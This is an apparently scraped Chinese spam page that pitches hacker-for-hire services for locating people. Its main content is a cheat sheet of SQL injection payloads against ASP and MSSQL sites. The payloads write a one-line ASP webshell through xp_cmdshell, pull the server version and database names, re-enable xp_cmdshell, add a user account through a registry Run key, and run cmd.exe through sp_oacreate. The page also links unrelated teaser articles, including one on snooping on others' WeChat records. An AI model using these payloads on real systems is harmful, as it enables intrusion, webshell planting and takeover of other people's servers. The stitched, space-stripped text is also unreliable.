找黑客追-黑客如何定位别人的位置(如何通过 *** 定位别人的位
1、用^转义字符来写ASP(一句话木马)文件的 *** :
?http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^executerequest^(l^)^^>>c:\mu.asp';--
?echo^<%execute^(request^(l^)^)%^>>c:\mu.asp
2、显示SQL系统版本:
?http://192.168.1.5/display.asp?keyno=188and1=(select@@VERSION)
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,@@version)--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)'toacolumnofdatatypeint.
/display.asp,行17
3、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select*frommytablewhereidin(1)”,括号中的值就是我们提交的数据,它的结果与使用“select*frommytablewhereid=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“)and1=1and1in(1”后原来的SQL语句就变成了“select*frommytablewhereidin(1)and1=1and1in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select*frommytablewherenamein('firstsee')”的查询语句造成的。
4、判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5、向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'
6、查看当前的数据库名称:
?http://192.168.1.5/display.asp?keyno=188and0<>db_name(n)n改成0,1,2,3……就可以跨库了
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,db_name())--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'huidahouse'toacolumnofdatatypeint.
/display.asp,行17
7、列出当前所有的数据库名称:
select*frommaster.dbo.sysdatabases列出所有列的记录
selectnamefrommaster.dbo.sysdatabases仅列出name列的记录
8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreate'wscript.shell',@shelloutput
EXECsp_oamethod@shell,'run',null,'cmd.exe/cdirc:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXECsp_oacreate'scripting.filesystemobject',@fsooutput
EXECsp_oamethod@fso,'opentextfile',@fileout,'c:\temp.txt'
--因为fso的opentextfile *** 将返回一个textstream对象,所以此时@file是一个对象令牌
相关文章
掏钱查他人手机微信记录可靠吗,网络黑客能够查微信聊天记录吗?
【文章百度收录网说】在我们与手机微信的平时沟通交流当中,闲聊信息内容保存在手机当中。假如手机上有什么问题,假如用手机登陆微信,则没法查看之前的聊天记录。手机微信并未启用聊天记录数据漫游作用。在沒有登陆...
四川绵阳市北川县发生4.7级地震-四川绵阳地震最
四川有多个地震带,所以每年基本上都会发生地震,而每次地震都会造成一些人员伤亡和经济损失。根据最新的消息报道,四川绵阳市北川县发生4.7级地震,此次地震和昨天发生的4.6级地震几乎处于同一位置,而有居民...
网上怎样买车险最划算(这样买最实惠最合理)
接近年底,又要到了更换车险的时候,那么我们应该如果购买最省钱又合理的车险种类呢? 一般车友都普通认为,车险交给4S店购买比较放心。但是一些4S店的销售员为了自己的业绩和提成,通常都会选择返...
悬赏猫:手机做义务赚钱,2元提现!
关于手机义务悬赏平台,之前主推的三个是趣闲赚,众人帮,牛帮。不外由于众人帮,前面时间降低了推广奖励,让人很不爽。我也以为是时刻再推一个类似平台了:悬赏猫。除了天天在手机上做种种义务免费赚钱,重点是它的...
怎么不被黑客定位(黑客手机号码定位教程)-美国网络被黑客入侵
怎么不被黑客定位(黑客手机号码定位教程)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑...
山水田园诗(古代最美的十首田园诗)
山水田园诗(古代最美的十首田园诗) 田园诗是中国古代诗歌的一个流派,其特色在于描写农村的朴实生活和田园的风光,至唐代的发展结合山水诗派出现山水田园诗派。东晋大诗人陶渊明开创了田园诗体后,唐宋等诗歌中...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!